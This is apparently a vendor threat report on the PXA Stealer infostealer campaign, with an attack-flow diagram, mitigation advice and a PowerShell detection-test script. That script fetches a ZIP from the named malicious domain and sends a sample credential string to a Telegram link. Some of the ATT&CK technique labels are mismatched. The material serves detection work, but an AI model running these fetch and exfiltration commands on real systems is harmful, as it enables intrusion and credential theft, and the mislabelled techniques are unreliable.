SOC Prime Bias: Medium

31 Mar 2026 16:58
newspaper icon CyberProof

From Phishing to Exfiltration: A Deep Dive into PXA Stealer

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
From Phishing to Exfiltration: A Deep Dive into PXA Stealer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The report describes a sharp rise in PXA Stealer activity targeting financial organizations in early 2026. Threat actors spread malicious ZIP archives through phishing emails and rely on a multi-stage infection chain that abuses legitimate system tools and a renamed Python interpreter. Once active, the malware steals browser credentials, saved passwords, and cryptocurrency wallet data, then exfiltrates the collected information through Telegram. The campaign highlights how operators have adjusted their tradecraft following earlier disruptions to other infostealer ecosystems.

Investigation

Researchers at CyberProof reconstructed the full attack chain, beginning with a phishing email that delivered a malicious Pumaproject.zip archive and ending with Telegram-based exfiltration. Their analysis identified abuse of Certutil for decoding, a copy of WinRAR disguised as picture.png for extraction, a hidden Dots folder, and a renamed svchost.exe Python interpreter used to launch an obfuscated script tied to a bot identifier. Persistence is maintained through a registry value entry.

Mitigation

Defenders should identify suspicious archive attachments, monitor script execution and known LOLBins from unexpected paths, and block outbound traffic to Telegram as well as unusual TLDs such as .shop and .xyz. Security teams should also harden email gateways and apply strict execution controls to Office files and script-based content.

Response

When PXA Stealer is detected, isolate the affected host, capture volatile evidence, and search for the referenced file artifacts and registry modifications. Remove malicious files, terminate affected processes, and reset any exposed credentials. Teams should then perform a wider threat hunt for matching indicators across the environment and notify relevant stakeholders.

graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#ffeb99 classDef process fill:#ffcc99 classDef persistence fill:#c2f0c2 classDef exfil fill:#f4c2c2 %% Node definitions action_phishing[“<b>Action</b> – <b>T1566.001 Phishing: Spearphishing Attachment</b><br/>Description: Email with malicious ZIP (Pumaproject.zip) containing Document.docx.exe.”] class action_phishing action file_zip[“<b>File</b> – Pumaproject.zip<br/><b>Contains</b>: Document.docx.exe”] class file_zip file action_user_exec[“<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Description: Victim opens the attached executable.”] class action_user_exec action process_malicious_exe[“<b>Process</b> – Document.docx.exe”] class process_malicious_exe process action_execution_hijack[“<b>Action</b> – <b>T1574 Hijack Execution Flow</b><br/>Description: Launches inter.cmd and uses certutil to decode payload from Shodan.pdf.”] class action_execution_hijack action process_inter_cmd[“<b>Process</b> – inter.cmd”] class process_inter_cmd process tool_certutil[“<b>Tool</b> – certutil.exe<br/><b>Purpose</b>: Decode base64 content”] class tool_certutil tool file_shodan_pdf[“<b>File</b> – Shodan.pdf<br/><b>Contains</b>: Base64 encoded payload”] class file_shodan_pdf file action_defense_embedded[“<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>Description: Payload hidden inside PDF file.”] class action_defense_embedded action action_decode[“<b>Action</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Description: certutil decodes the payload.”] class action_decode action action_hidden_dir[“<b>Action</b> – <b>T1564.001 Hidden Files and Directories</b><br/>Description: Malware creates hidden folder \”Dots\” for intermediate files.”] class action_hidden_dir action file_hidden_dir[“<b>File</b> – Dots (hidden directory)”] class file_hidden_dir file action_relocate[“<b>Action</b> – <b>T1070.010 Indicator Removal: Relocate Malware</b><br/>Description: Moves malicious files into hidden \”Dots\” directory.”] class action_relocate action action_compression[“<b>Action</b> – <b>T1027.015 Compression</b><br/>Description: WinRAR disguised as picture.png extracts password‑protected archive (password shodan2201).”] class action_compression action tool_winar[“<b>Tool</b> – WinRAR (renamed picture.png)”] class tool_winar tool file_archive[“<b>File</b> – Password protected archive (shodan2201)”] class file_archive file action_rc_script[“<b>Action</b> – <b>T1037.004 RC Scripts</b><br/>Description: Portable Python dropped, renamed to svchost.exe and executed with $BOT_ID argument.”] class action_rc_script action process_svc_host[“<b>Process</b> – svchost.exe (malicious Python interpreter)”] class process_svc_host process action_active_setup[“<b>Action</b> – <b>T1547.014 Active Setup</b><br/>Description: Registry entry added to run svchost.exe at startup.”] class action_active_setup action action_com_hijack[“<b>Action</b> – <b>T1546.015 COM Hijacking</b><br/>Description: COM hijacking registry entry created for automatic execution.”] class action_com_hijack action action_cred_browser[“<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b><br/>Description: Injects into browsers to steal passwords, cookies, crypto wallet data.”] class action_cred_browser action action_cred_cookies[“<b>Action</b> – <b>T1539 Steal Web Session Cookie</b><br/>Description: Extracts web session cookies for reuse.”] class action_cred_cookies action action_keylogging[“<b>Action</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Description: Captures keystrokes from the user.”] class action_keylogging action action_exfil_telegram[“<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Description: Sends collected data to attacker‑controlled Telegram channels.”] class action_exfil_telegram exfil action_exfil_c2[“<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Description: Uses Telegram as C2 and exfiltration channel.”] class action_exfil_c2 exfil %% Connections action_phishing –>|delivers| file_zip file_zip –>|executes| action_user_exec action_user_exec –>|runs| process_malicious_exe process_malicious_exe –>|launches| action_execution_hijack action_execution_hijack –>|spawns| process_inter_cmd process_inter_cmd –>|uses| tool_certutil tool_certutil –>|decodes| file_shodan_pdf file_shodan_pdf –>|contains| action_defense_embedded action_defense_embedded –>|triggers| action_decode action_decode –>|creates| action_hidden_dir action_hidden_dir –>|creates| file_hidden_dir action_hidden_dir –>|stores| action_relocate action_relocate –>|moves files to| file_hidden_dir action_relocate –>|leads to| action_compression action_compression –>|uses| tool_winar tool_winar –>|extracts| file_archive file_archive –>|provides| action_rc_script action_rc_script –>|executes| process_svc_host process_svc_host –>|establishes| action_active_setup process_svc_host –>|establishes| action_com_hijack process_svc_host –>|enables| action_cred_browser process_svc_host –>|enables| action_cred_cookies process_svc_host –>|enables| action_keylogging action_keylogging –>|feeds data to| action_exfil_telegram action_cred_browser –>|feeds data to| action_exfil_telegram action_cred_cookies –>|feeds data to| action_exfil_telegram action_exfil_telegram –>|uses channel| action_exfil_c2

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The threat actor deploys the PXA Stealer on a compromised Windows host. After the user unwittingly executes the initial malicious binary (T1204.002), the stealer runs a PowerShell snippet that:

    1. Downloads a malicious ZIP from the hard‑coded domain downloadtheproject.xyz (T1202 – indirect command execution).
    2. Exfiltrates the harvested data by posting a message to a Telegram channel via t.me (T1559.002 – phishing link).
    3. Optionally loads a malicious COM component to achieve persistence (T1127.002).

    Both outbound HTTP GET requests generate the DestinationDomain fields that the Sigma rule watches, causing an alert.

  • Regression Test Script:

    # PXA Stealer simulation – triggers the detection rule
$tmpZip = "$env:TEMPpayload.zip"
$tmpMsg = "$env:TEMPsteal.txt"

# 1. Download malicious ZIP from the first malicious domain
Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing

# 2. Simulate data exfiltration via Telegram link
$payload = "User credentials: admin / Pass123!"
Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII
Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$( [uri]::EscapeDataString($payload) )" -UseBasicParsing

# 3. (Optional) Load a dummy COM object to emulate T1127.002
try {
    $com = New-Object -ComObject "Shell.Application"
    $com.ShellExecute($tmpZip, "", "", "open", 0) | Out-Null
} catch {
    # Ignore errors – this is only for telemetry
}

  • Cleanup Commands:

    # Remove artifacts created by the simulation
Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue
Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free